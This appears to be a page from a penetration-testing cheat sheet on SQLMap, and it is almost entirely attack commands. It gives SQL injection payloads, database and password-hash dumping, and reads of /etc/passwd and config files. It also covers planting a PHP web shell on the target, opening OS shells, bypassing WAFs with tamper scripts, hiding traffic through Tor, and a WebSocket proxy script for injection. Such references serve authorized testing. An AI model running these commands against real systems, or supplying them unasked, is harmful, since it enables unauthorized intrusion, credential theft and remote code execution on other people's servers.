SQLMap

Automated SQL injection detection and exploitation tool.

Install: apt install sqlmap or git clone https://github.com/sqlmapproject/sqlmap.git

Quick Reference

# Basic scan
sqlmap -u "http://target.com/page.php?id=1" --batch

# From Burp/ZAP request file
sqlmap -r request.txt --batch

# POST data
sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --batch

# With cookies
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"

# Enumerate databases
sqlmap -u "http://target.com/page.php?id=1" --dbs

# Enumerate tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables

# Dump table
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

# OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell

Supported DBMS

DBMS

MySQL

Oracle

PostgreSQL

MS SQL Server

SQLite

IBM DB2

MS Access

Firebird

Sybase

SAP MaxDB

MariaDB

CockroachDB

SQLi Types (--technique=BEUSTQ)

Char

Technique

Example Payload

B

Boolean-based blind

AND 1=1

E

Error-based

AND GTID_SUBSET(@@version,0)

U

Union query-based

UNION ALL SELECT 1,@@version,3

S

Stacked queries

; DROP TABLE users

T

Time-based blind

AND 1=IF(2>1,SLEEP(5),0)

Q

Inline queries

SELECT (SELECT @@version) FROM

Common Flags

Essential

--batch              # Non-interactive (auto-accept defaults)
-u URL               # Target URL with parameter
-r FILE              # Read request from file
--data="param=val"   # POST data
-p PARAM             # Specific parameter to test

Enumeration

--dbs                # Enumerate databases
--tables             # Enumerate tables
--columns            # Enumerate columns
--dump               # Dump table data
--dump-all           # Dump all databases
-D DB                # Specify database
-T TABLE             # Specify table
-C COL1,COL2         # Specify columns

Info Gathering

--banner             # DBMS banner
--current-user       # Current user
--current-db         # Current database
--hostname           # Server hostname
--is-dba             # Check if DBA privileges
--users              # Enumerate users
--passwords          # Enumerate password hashes

Tuning

--level=1-5          # Test thoroughness (default 1)
--risk=1-3           # Risk of tests (default 1)
--technique=BEUSTQ   # SQLi techniques to use
--threads=10         # Number of threads

OPSEC

--random-agent       # Random User-Agent
--mobile             # Mobile User-Agent
--user-agent="..."   # Custom User-Agent
--tor                # Use Tor
--check-tor          # Verify Tor is working
--proxy="http://127.0.0.1:8080"

Request Options

Cookies & Headers

--cookie="PHPSESSID=abc123; security=low"
-H "X-Forwarded-For: 127.0.0.1"
-H "Authorization: Bearer token123"

HTTP Method

--method=PUT
--method=DELETE

Mark Injection Point

Use * to mark specific parameter:

sqlmap -u "http://target.com/api" --data="id=1*&name=test"
sqlmap -u "http://target.com/page?id=1*"

From Burp Request File

# Save request to file from Burp (Right-click > Copy to file)
sqlmap -r request.txt --batch

Example request file:

GET /page.php?id=1 HTTP/1.1
Host: target.com
Cookie: PHPSESSID=abc123
User-Agent: Mozilla/5.0

Database Enumeration

Step-by-Step

# 1. Find databases
sqlmap -u "URL" --dbs

# 2. Find tables in database
sqlmap -u "URL" -D dbname --tables

# 3. Find columns in table
sqlmap -u "URL" -D dbname -T tablename --columns

# 4. Dump specific columns
sqlmap -u "URL" -D dbname -T tablename -C username,password --dump

# 5. Dump with conditions
sqlmap -u "URL" -D dbname -T tablename --where="id>10" --dump

# 6. Dump rows range
sqlmap -u "URL" -D dbname -T tablename --start=1 --stop=10 --dump

Search for Data

# Search for tables containing "user"
sqlmap -u "URL" --search -T user

# Search for columns containing "pass"
sqlmap -u "URL" --search -C pass

Schema

# Get full database schema
sqlmap -u "URL" --schema

File Operations

Read Files

sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-read="/var/www/html/config.php"

# File saved to: ~/.sqlmap/output/target.com/files/

Write Files

# Create shell locally first
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Write to target
sqlmap -u "URL" --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# Verify
curl "http://target.com/shell.php?cmd=id"

OS Command Execution

Interactive Shell

sqlmap -u "URL" --os-shell

# If UNION fails, try error-based
sqlmap -u "URL" --os-shell --technique=E

SQL Shell

sqlmap -u "URL" --sql-shell

WAF Bypass

Anti-CSRF Token

sqlmap -u "URL" --csrf-token="csrf-token"

Randomize Parameter

sqlmap -u "http://target.com/?id=1&rp=12345" --randomize=rp

Calculated Parameter (e.g., hash)

sqlmap -u "http://target.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" \
       --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()"

Tamper Scripts

# Single tamper
sqlmap -u "URL" --tamper=space2comment

# Chained tampers
sqlmap -u "URL" --tamper=between,randomcase,space2comment

# List all tamper scripts
sqlmap --list-tampers

Common Tamper Scripts

Script

Description

space2comment

Replace spaces with /**/

between

Replace > with NOT BETWEEN 0 AND

randomcase

Random case keywords

equaltolike

Replace = with LIKE

base64encode

Base64 encode payload

charencode

URL encode characters

space2plus

Replace spaces with +

space2hash

Replace spaces with # (MySQL)

percentage

Add % before each character

modsecurityversioned

MySQL versioned comments

Other Bypass Options

--random-agent        # Bypass user-agent blacklist
--chunked             # Chunked transfer encoding
--hpp                 # HTTP Parameter Pollution
--skip-waf            # Skip WAF detection

Troubleshooting

Parse Errors

sqlmap -u "URL" --parse-errors

Save Traffic

sqlmap -u "URL" -t /tmp/traffic.txt

Verbose Output

sqlmap -u "URL" -v 3      # Show payloads
sqlmap -u "URL" -v 6      # Full HTTP traffic

Through Proxy

sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

Specify Prefix/Suffix

sqlmap -u "URL" --prefix="%'))" --suffix="-- -"

Level & Risk Settings

Level

Tests

Default - basic tests

Add Cookie testing

Add User-Agent/Referer testing

More payloads

Maximum - all boundaries

Risk

Tests

Default - safe tests

Add heavy time-based

Add OR-based (can modify data!)

# Maximum testing (slow, noisy)
sqlmap -u "URL" --level=5 --risk=3

SQLMap Over WebSockets

SQLMap doesn't natively support WebSockets. Use a Flask proxy to translate HTTP requests to WebSocket messages.

Flask Proxy Script

# ws_proxy.py
from flask import Flask, request
from websocket import create_connection

app = Flask(__name__)

ws_url = "ws://target.com:9091"  # WebSocket endpoint

@app.route("/")
def handle():
    query = request.args.get('query')
    
    ws = create_connection(ws_url)
    
    # Modify payload format as needed for target
    payload = '{"id":"%s"}' % query
    
    ws.send(payload)
    res = ws.recv()
    ws.close()
    
    return res if res else "no response"

if __name__ == "__main__":
    app.run(debug=False)

Setup & Run

# Setup
python3 -m venv .venv
source .venv/bin/activate
pip install flask websocket-client

# Run proxy
flask run
# or: python ws_proxy.py

# Now use sqlmap against local proxy
sqlmap -u "http://localhost:5000/?query=1" --batch --dbs

Common WebSocket Payload Formats

# JSON with id parameter
payload = '{"id":"%s"}' % query

# JSON with ticket/search
payload = '{"ticket":"%s"}' % query

# Plain text
payload = query

Reference: https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

Useful One-Liners

# Quick DB dump
sqlmap -u "URL" --dump --batch

# Get shell fast
sqlmap -u "URL" --os-shell --batch --technique=E

# Dump passwords and crack
sqlmap -u "URL" --passwords --batch

# Full auto-pwn
sqlmap -u "URL" --all --batch

# Crawl and test forms
sqlmap -u "http://target.com/" --forms --crawl=2 --batch

Output Files

Results saved to: ~/.sqlmap/output/<target>/

~/.sqlmap/output/target.com/
├── dump/           # Dumped tables (CSV)
├── files/          # Downloaded files
├── log             # Session log
└── session.sqlite  # Session data (resume scans)

Session Management

# Resume previous session
sqlmap -u "URL"  # Auto-resumes if session exists

# Fresh scan (ignore session)
sqlmap -u "URL" --flush-session

# Specify output directory
sqlmap -u "URL" --output-dir=/tmp/sqlmap_out

PreviousOWASP ZAP NextPowerView

Last updated 5 days ago

hashtagQuick Reference

hashtagSupported DBMS

hashtagSQLi Types (--technique=BEUSTQ)

hashtagCommon Flags

hashtagEssential

hashtagEnumeration

hashtagInfo Gathering

hashtagTuning

hashtagOPSEC

hashtagRequest Options

hashtagCookies & Headers

hashtagHTTP Method

hashtagMark Injection Point

hashtagFrom Burp Request File

hashtagDatabase Enumeration

hashtagStep-by-Step

hashtagSearch for Data

hashtagSchema

hashtagFile Operations

hashtagRead Files

hashtagWrite Files

hashtagOS Command Execution

hashtagInteractive Shell

hashtagSQL Shell

hashtagWAF Bypass

hashtagAnti-CSRF Token

hashtagRandomize Parameter

hashtagCalculated Parameter (e.g., hash)

hashtagTamper Scripts

hashtagCommon Tamper Scripts

hashtagOther Bypass Options

hashtagTroubleshooting

hashtagParse Errors

hashtagSave Traffic

hashtagVerbose Output

hashtagThrough Proxy

hashtagSpecify Prefix/Suffix

hashtagLevel & Risk Settings

hashtagSQLMap Over WebSockets

hashtagFlask Proxy Script

hashtagSetup & Run

hashtagCommon WebSocket Payload Formats

hashtagUseful One-Liners

hashtagOutput Files

hashtagSession Management